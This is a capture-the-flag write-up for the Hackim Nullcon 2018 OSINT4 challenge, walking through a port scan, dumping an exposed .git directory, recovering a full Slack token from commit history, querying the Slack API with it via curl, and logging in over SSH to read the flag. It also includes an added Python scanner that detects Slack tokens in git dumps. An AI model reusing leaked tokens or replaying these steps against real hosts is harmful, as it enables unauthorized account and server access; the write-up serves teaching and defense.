Hackim Nullcon CTF – OSINT4
ID-10-T Team
In this challenge they give us an IP address and we have to exploit a configuration flaw to return control to the legitimate owners. First, we scan the ports of this IP address:
$ nmap -sS 54.85.105.103

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-11 13:08 EST
Nmap scan report for ec2-54-85-105-103.compute-1.amazonaws.com (54.85.105.103)
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
We try to connect via HTTP:
Next, we discover web content, for example with Burp Intruder:
We find a .git directory. Let's download it and analyse it with GitTools:
Dump:
$ ./gitdumper.sh http://54.85.105.103/.git/ dump/
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########

[*] Destination folder does not exist
[+] Creating dump//.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[-] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[+] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[+] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[+] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/ac/fc9dc1aeb220fc298129e361657dcf29f9ca73
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/7c/3b9ebe9efb7c7a107dd50cfcea5a45294a5e21
[+] Downloaded: objects/e7/62de10c5cc16a55ab62ce2e86ea7cedee37119
[+] Downloaded: objects/69/070f481086429a5171eee0db344c6e5f763180
[+] Downloaded: objects/f4/dbd1e4160988fc21955029e43a07c29e647461
[+] Downloaded: objects/0d/63125df015d371b7cbddc3ab41afa517784ca0
[+] Downloaded: objects/08/c42890845313fe6ce1cba1d8724d894a616c58
[+] Downloaded: objects/0f/250d442daaaf05714ddb312d39df823f0abef7
[+] Downloaded: objects/2b/5c11fb5d58e3e2834fca06ac41b997aaceb3c1
[+] Downloaded: objects/14/552d0244d9d36bd862bd3af58b9424d05a145a
Extract:
$ ./extractor.sh ../Dumper/dump/ dump_extract/
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########

[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1
[+] Found file: /GitTools/Extractor/dump_extract/0-2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1/README.md
[+] Found commit: 0d63125df015d371b7cbddc3ab41afa517784ca0
[+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/README.md
[+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config
[+] Found commit: e762de10c5cc16a55ab62ce2e86ea7cedee37119
[+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/README.md
[+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/Slack Config
[+] Found commit: acfc9dc1aeb220fc298129e361657dcf29f9ca73
[+] Found file: /GitTools/Extractor/dump_extract/3-acfc9dc1aeb220fc298129e361657dcf29f9ca73/README.md
We look at the «Slack Config» file, which only exists in the two middle commits (it was removed from the newest one but remains in the history):
$ cat "/GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config"
Organisation Slack https://corpnull.slack.com
Slack Token: xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5
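The same lesson from the defender's side, as an added example that is not part of the original writeup: a small scanner that walks a GitTools-style extract directory (`<n>-<commit>/<file>`) and reports every commit still holding a Slack token, so a secret that was "deleted" in the latest commit is caught in the older ones. The directory layout and the token value are constructed here; the regex follows the xoxp-digits-digits-digits-32hex shape of the token found above.

```python
import os
import re
import tempfile

# Slack tokens look like xoxp-<digits>-<digits>-<digits>-<32 hex>; the class
# [abpr] also covers bot (xoxb), app (xoxa) and refresh (xoxr) token prefixes.
SLACK_TOKEN_RE = re.compile(r"\bxox[abpr]-[0-9]{10,13}(?:-[0-9]{10,13}){1,2}-[0-9a-f]{32}\b")

def mask(token):
    # Keep prefix and last 4 chars so a finding can be matched to the secret
    # without reprinting it in scan logs.
    return token[:5] + "..." + token[-4:]

def scan_extracted_dump(dump_dir):
    """Return {commit: [(relative_file, masked_token), ...]} for every file in
    any <n>-<commit>/ directory under dump_dir that contains a Slack token."""
    findings = {}
    for entry in sorted(os.listdir(dump_dir)):
        commit_dir = os.path.join(dump_dir, entry)
        if not os.path.isdir(commit_dir) or "-" not in entry:
            continue
        commit = entry.split("-", 1)[1]
        for root, _dirs, files in os.walk(commit_dir):
            for name in files:
                path = os.path.join(root, name)
                with open(path, "r", errors="replace") as fh:
                    for m in SLACK_TOKEN_RE.finditer(fh.read()):
                        rel = os.path.relpath(path, commit_dir)
                        findings.setdefault(commit, []).append((rel, mask(m.group(0))))
    return findings

def build_sample_dump():
    """Constructed sample mirroring the extractor output: four commits, and the
    'Slack Config' file exists only in the two middle ones. Token is made up."""
    base = tempfile.mkdtemp()
    fake = "xoxp-000000000001-000000000002-000000000003-" + "0123456789abcdef" * 2
    layout = {
        "0-aaaa0": {"README.md": "# corpnull\n"},
        "1-bbbb1": {"README.md": "# corpnull\n", "Slack Config": "Slack Token: " + fake + "\n"},
        "2-cccc2": {"README.md": "# corpnull\n", "Slack Config": "Slack Token: " + fake + "\n"},
        "3-dddd3": {"README.md": "# corpnull\n"},
    }
    for commit, files in layout.items():
        os.makedirs(os.path.join(base, commit))
        for name, body in files.items():
            with open(os.path.join(base, commit, name), "w") as fh:
                fh.write(body)
    return base

if __name__ == "__main__":
    for commit, hits in scan_extracted_dump(build_sample_dump()).items():
        for rel, tok in hits:
            print(f"{commit}: {rel}: {tok}")
```

A finding in any commit means the token must be revoked, not merely removed from the tree, because the full history is what an exposed .git directory hands out.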
We have a Slack token, so let's play with the Slack API. List the channels:
$ curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' \
       -H 'Content-type: application/x-www-form-urlencoded' \
       https://slack.com/api/channels.list
The most interesting channel is «C8Y41NDEJ»:
Next, we view the conversation history of this channel (the method is channels.history):
$ curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' \
       -H 'Content-type: application/x-www-form-urlencoded' \
       "https://slack.com/api/channels.history?token=xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5&channel=C8Y41NDEJ"
In the Slack chat we found an RSA private key and a username, which we use to connect to the SSH server:
$ ssh mikeatcorp@54.85.105.103
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-1047-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

24 packages can be updated.
0 updates are security updates.

*** System restart required ***
Last login: Sun Feb 11 11:16:33 2018 from
mikeatcorp@ip-172-30-1-179:~$ locate flag.txt
/secret/.supersecret/flag.txt
mikeatcorp@ip-172-30-1-179:~$ cat /secret/.supersecret/flag.txt
hackim18{'455676878965435365788698546'}
mikeatcorp@ip-172-30-1-179:~$
Flag: hackim18{'455676878965435365788698546'}
Thanks to DanitorwS for solving some problems with this challenge.
Cheers.